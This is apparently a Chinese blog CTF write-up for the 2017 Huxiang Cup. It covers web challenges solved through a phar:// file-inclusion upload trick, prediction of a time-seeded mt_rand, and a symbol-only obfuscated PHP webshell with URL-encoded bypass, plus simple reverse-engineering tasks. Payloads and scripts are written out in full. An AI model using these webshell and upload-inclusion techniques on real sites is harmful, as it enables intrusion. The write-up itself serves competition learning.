<p><a href="https://github.com/ctfs/write-ups-2016/blob/master/pragyan-ctf-2016/steganography/who-made-me-100/README.md#other-write-ups-and-resources" target="_blank" rel="external">github原题</a></p>
<p>人家原题叫who made me ,这tm 叫misc300。。醉了</p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="web200"><a href="#web200" class="headerlink" title="web200:"></a>web200:</h3><p>题目提示：只是一个普通的上传。<br>打开页面以后得到亮点提示：<br>a.只能上传png  b.htmlentities(ucfirst($op)); op变量做过简单的处理。</p>
<p>打开upload页面发现<a href="http://118.190.87.135:10080/?op=upload" target="_blank" rel="external">http://118.190.87.135:10080/?op=upload</a>  ==&gt;  op=upload应该是文件包含。<br>扫描一下目录：<code>upload.php</code>、<code>home.php</code>、<code>flag.php</code>、<code>show.php</code>加上两个目录<code>image</code>和<code>uploads</code></p>
<p>上传一个png</p>
<p><img src="https://i.loli.net/2017/11/26/5a199477a7d46.png" alt="{0Z)8U}WOM{[T(ORU6K])9G.png"></p>
<p>页面返回URL:  <code>op=show&amp;imagekey=cf32f1071d5f2a4b89c72df04a1b5de02dce2bf1</code></p>
<p>到这里就更加印证了是一个文件包含漏洞了<br>这个<code>imagekey</code>应该就是上传后的文件名，上传的文件应该是在<code>uploads</code>文件下：</p>
<p><img src="https://i.loli.net/2017/11/26/5a1994d41f613.png" alt="SQ_E"></p>
<p>果然,然后包含它</p>
<p><img src="https://i.loli.net/2017/11/26/5a19950718d99.png" alt="S5g"></p>
<p>重新思考了一下，包含<code>upload.php</code>的时候，是<code>op=upload</code> 那么其代码应该是<code>op=$_GET[op].’.php’</code>;在文件中加上php的，这时候我想到<code>phar://</code>协议。<br>将<code>x.php</code>(一句话shell)压缩成zip格式，然后再改成png格式上传到服务器，用包含结合phar协议来执行php文件：<br>Payload：<br><code>op=phar://./uploads/e3b413b087bd7f56d3a67d3f970a88c489b60e66.png/x</code></p>
<p>可以执行，然后读取flag.php中的内容</p>
<p><code>Payload</code>:<code>x=highlight_file(&#39;././flag.php&#39;);</code></p>
<p><img src="https://i.loli.net/2017/11/26/5a1995e9ef24f.png" alt="MURTSng"></p>
<h3 id="web150-random"><a href="#web150-random" class="headerlink" title="web150 random"></a>web150 random</h3><p>这道题是相当的坑，11点出了以后到4点左右才正常。</p>
<p>像这样的题，进去没什么提示，首先想到的源代码泄露，然后审计代码绕过一些的。访问.index.php.swp存在，这个是vi编辑器留下的，但是在11点-4点之间这段时间，这个里面根本没有源码，和index一样是乱码。</p>
<p><img src="https://i.loli.net/2017/11/26/5a19963542d8d.png" alt="O.png"></p>
<p>源码看到以后，就发现是<code>mt_rand()</code>伪加密，<code>mt_srand()</code>以<code>time()</code>为种子进行播种，<code>mt_rand()</code>生成的内容是依赖于<code>time()</code>的。<br>思路：用python直接访问页面拿到pwd的值，在<code>time()</code>生成的时间戳变化之前提交上去，就可以绕过第一层<code>if($pwd == $_GET[pwd])</code>，但是这乱码是什么东东？<br>把源码放在本地，然后去生成、输出pwd 和 session。</p>
<p><img src="https://i.loli.net/2017/11/26/5a19968372d1f.png" alt="ng"></p>
<p>发现还是乱码，那可能pwd就是乱码，ok。写个脚本，让脚本先访问题目地址，处理题目地址返回页面，取出pwd的值，再访问本地页面对比pwd的值，如果相同，则把本地页面生成的pwd、session的值分别作为pwd参数和action参数的值提交上去。</p>
<p>Flag为：<code>you get the flag it is hxb2017{6583be26c1403c25677c03ac7b3d1f22}</code></p>
<p><img src="https://i.loli.net/2017/11/26/5a19980a0eeef.png" alt="QG7SHg"></p>
<p>脚本：</p>
<pre><code>import requests,re

#re_pass = re.compile(r&#39;&lt;br&gt;.+||&#39;)
url = &quot;http://114.215.138.89:10080/&quot;
while True:
    res = requests.get(url)
    s = res.content[29:-8]
    print s
    resloaction=requests.get(&quot;http://127.0.0.1/test.php&quot;)
    list = resloaction.content.split(&#39; &#39;)
    params={}
    if list[0]==s :
        params[&#39;login&#39;]=list[1]
        params[&#39;pwd&#39;]=s
        #params[&#39;login&#39;]=s
    resp = requests.get(url,params=params)
    if &#39;flag&#39; in resp.content :
        print resp.content
        break;
    elif &#39;Wrong&#39; in resp.content :
        print &#39;Wrong&#39;
    elif &#39;first&#39; in resp.content :
        print &#39;first&#39;
    else :
        pass
</code></pre><p>本地页面源码</p>
<pre><code>&lt;?php
function create_password($pw_length =  10){
$randpwd = &quot;&quot;;
for ($i = 0; $i &lt; $pw_length; $i++){
$randpwd .= chr(mt_rand(100, 200));
}
return $randpwd;
}
mt_srand(time());
$pwd=create_password();
echo $pwd.&#39; &#39;;
//echo &quot;&lt;br&gt;&quot;;
echo create_password(32).rand();
</code></pre><h3 id="web300"><a href="#web300" class="headerlink" title="web300"></a>web300</h3><p>访问看到源码，过滤了很多字符，但是<code>()[]=’+.;</code>这些字符没过滤，题目又提示能getshell。这让我想起了以前在网上看到过的一个符号一句话木马。</p>
<pre><code>&lt;?php
$_=[].[];$__=&#39;&#39;;$_=$_[&#39;&#39;];$_=++$_;$_=++$_;$_=++$_;$_=++$_;$__.=$_;$_=++$_;$_=++$_;$__=$_.$__;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$__.=$_;${&#39;_&#39;.$__}[_](${&#39;_&#39;.$__}[__]);
?&gt;
</code></pre><p>但是提交被拦截</p>
<p>因为<code>+</code>在url中表示空格，而题目拦截空格。所以要把<code>+</code> 进行一次URL编码，传入后会自动进行解码：<br>将符号一句话中的+全部用<code>%2b</code>替换</p>
<p><img src="https://i.loli.net/2017/11/26/5a1998ed4277c.png" alt="ng"></p>
<p>getflag</p>
<p><img src="https://i.loli.net/2017/11/26/5a1998ee01dd7.png" alt="ng"></p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="简单的Android"><a href="#简单的Android" class="headerlink" title="简单的Android"></a>简单的Android</h3><p>apk文件</p>
<p>解压后用dex2jar把classes.dex转换成jar包</p>
<p>用jd-gui打开，发现代码中直接就包含了flag明文。没安装测试，直接交就过了</p>
<p><img src="https://i.loli.net/2017/11/26/5a199972c4db7.png" alt="Y_g"></p>
<h3 id="RE100"><a href="#RE100" class="headerlink" title="RE100"></a>RE100</h3><p>发现是win，还有upx壳，用3.91版的upx -d解压成功</p>
<p><img src="https://i.loli.net/2017/11/26/5a1999a039448.png" alt="DPng"></p>
<p>解压后直接运行会挂掉，ida打开，main函数就在启动函数上面几个（通过字符串提示发现main函数）</p>
<p><img src="https://i.loli.net/2017/11/26/5a1999cbceb97.png" alt="Q.png"></p>
<p>按f5可以得到如下c代码</p>
<p><img src="https://i.loli.net/2017/11/26/5a1999f1b2737.png" alt="ng"></p>
<p>虽然很多函数没有识别，但是不影响这些分析<br>发现一堆没用的代码，其实关键的就是圈中的代码而已。这里的输入才会影响后面的结果。至于判断条件，if嵌套if，似乎不可能达成这些条件，应该是程序挂掉的原因。所以，直接进入关键函数<code>sub_401080</code></p>
<p><img src="https://i.loli.net/2017/11/26/5a199a264c0dc.png" alt="Xg"></p>
<p>明显是按位异或，供44个字符，每个和<code>x22</code>或后等于相应的值就可以，反向计算拿到flag。但是要注意顺序，读取的行数是换了的，而且注意低存低高存高</p>
<p><img src="https://i.loli.net/2017/11/26/5a199a588781f.png" alt="400SKg"></p>
<p>本来想用idc脚本把数据抠出来，然后异或就好了。但是出了点问题，会读取出特别大的数字，只能一个一个手动弄出来。按照行的顺序，每一行从右边到左边。然后写python脚本如下：</p>
<p><img src="https://i.loli.net/2017/11/26/5a199a7e1364d.png" alt="9ng"></p>
<p>执行得到结果</p>
<p><img src="https://i.loli.net/2017/11/26/5a199a9e73237.png" alt="1JAHng"></p>
<hr>
<p>ps:</p>
<p>web400差点做出来，比赛结束前7分钟改题也是牛逼，misc100直接换题，misc300偷来原题还不给题目名，misc200用一堆写的屎一样的英文来强行加难度，这出题人真的是服气</p>
<p>送出题人串字母啊 mmmmmmmmp!</p>
<p><img src="https://i.loli.net/2017/11/26/5a199b981b208.png" alt="6B0A20D7E3459F95CF6A342445184C88.png"></p>
<hr>
<p><em>*转载请注明来自<a href="https://ares-x.com">AresX’s Blog</a></em></p>

        
                <blockquote style="margin: 2em 0 0;padding: 0.5em 1em;border-left: 3px solid #F44336;background-color: #F5F5F5;list-style: none;">
                    <p><strong>
                         
                            本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.转载请注明出处</a>
                        </strong>
                        <br>
                        <strong>本文链接：</strong><a href="https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/">https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/</a>
                    </p>
                </blockquote>
        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
    <div id="comment" style='padding:10px;' class="vcomment"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    var GUEST_INFO = ['nick','mail','link'];
    var guest_info = 'nick,mail,link'.split(',').filter(function(item){
        return GUEST_INFO.indexOf(item) > -1
    });
    var notify = 'false' == true;
    var verify = 'false' == true;
    new Valine({
        el: '.vcomment',
        notify: notify,
        verify: verify,
        appId: "03dPjIOLsmkJMRIjhK2oWRyf-gzGzoHsz",
        appKey: "ryjaCKlEtRE4g5YBLLmS733Q",
        placeholder: "来写下你的评论吧!(填写邮箱字段会及时收到回复通知)",
        pageSize:'10',
        avatar:'identicon',
        lang:'zh-cn'
    });
</script>

                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2017/11/28/风月令-叶羽千华/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2017/11/22/Office全版本漏洞CVE-2017-11882利用复现/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>



                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(https://cache-1253916356.file.myqcloud.com/img/sidebar.jpg);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="https://cache-1253916356.file.myqcloud.com/img/aresx.png" alt="AresX's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        YXJlc3hAcHJvdG9ubWFpbC5jb20=
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="mailto: YXJlc3hAcHJvdG9ubWFpbC5jb20=" target="_blank" title="Email Me">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">email</i>
                        
                        Email Me
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2018/10/">十月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/06/">六月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/05/">五月 2018<span class="sidebar_archives-count">5</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/04/">四月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/03/">三月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/02/">二月 2018<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/01/">一月 2018<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/12/">十二月 2017<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/11/">十一月 2017<span class="sidebar_archives-count">8</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/10/">十月 2017<span class="sidebar_archives-count">8</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/09/">九月 2017<span class="sidebar_archives-count">5</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/08/">八月 2017<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/07/">七月 2017<span class="sidebar_archives-count">6</span></a>
            </ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/CTF/">CTF<span class="sidebar_archives-count">9</span></a></li><li><a class="sidebar_archives-link" href="/categories/In-My-Heart/">In My Heart<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/categories/Linux/">Linux<span class="sidebar_archives-count">7</span></a></li><li><a class="sidebar_archives-link" href="/categories/屠龙之技/">屠龙之技<span class="sidebar_archives-count">10</span></a></li><li><a class="sidebar_archives-link" href="/categories/杂文/">杂文<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/categories/渗透不测试/">渗透不测试<span class="sidebar_archives-count">12</span></a></li><li><a class="sidebar_archives-link" href="/categories/编程无道/">编程无道<span class="sidebar_archives-count">3</span></a>
            </ul>
        </li>
        
    

    <!-- Pages  -->
    
        <li>
            <a href="/timeline" title="时间轴">
                
                    <i class="material-icons sidebar-material-icons">sort</i>
                
                时间轴
            </a>
        </li>
        
            <li class="divider"></li>
        
    
        <li>
            <a href="/about" title="关于我">
                
                    <i class="material-icons sidebar-material-icons">person</i>
                
                关于我
            </a>
        </li>
        
    
        <li>
            <a href="/links" title="友链">
                
                    <i class="material-icons sidebar-material-icons">group</i>
                
                友链
            </a>
        </li>
        
    

    <!-- Article Number  -->
    
        <li>
            <a href="/archives">
                文章总数
                <span class="sidebar-badge">50</span>
            </a>
        </li>
        
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->

    <div class="sidebar-divider"></div>


<!-- Theme Material -->


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    

                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    

                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    

    <!-- Facebook -->
    

    <!-- Google + -->
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    
        <a href="https://github.com/Ares-X" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-github">
                <span class="visuallyhidden">Github</span>
            </button><!--
     --></a>
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    

    <!-- Telegram -->
    
        <a href="https://t.me/Axxxxk" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-telegram">
                <span class="visuallyhidden">Telegram</span>
            </button><!--
     --></a>
    
    
    <!-- V2EX -->
    
</div>


        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©&nbsp;2017&nbsp;-<script type="text/javascript">var fd = new Date();document.write("&nbsp;" + fd.getFullYear() + "&nbsp;");</script>AresX's Blog
            
        </div>

        <!-- Paradox Footer Right Section -->

        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)

        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->

        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>


                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","https://cache-1253916356.file.myqcloud.com/source/js/lazyload.min.js", true)</script>



    <script>lsloader.load("js_js","https://cache-1253916356.file.myqcloud.com/source/js/js.min.js", true)</script>



    <script>lsloader.load("np_js","https://cache-1253916356.file.myqcloud.com/source/js/nprogress.js", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>







    <!-- Busuanzi -->
    <script src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>



   





<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->

    
        
            <script>lsloader.load("prettify_js","https://cache-1253916356.file.myqcloud.com/source/js/prettify.min.js", true)</script>
        
    



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
        
            $(function() {
                $('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
                prettyPrint();
                })
        
    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.2 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        </body>
    
</html>
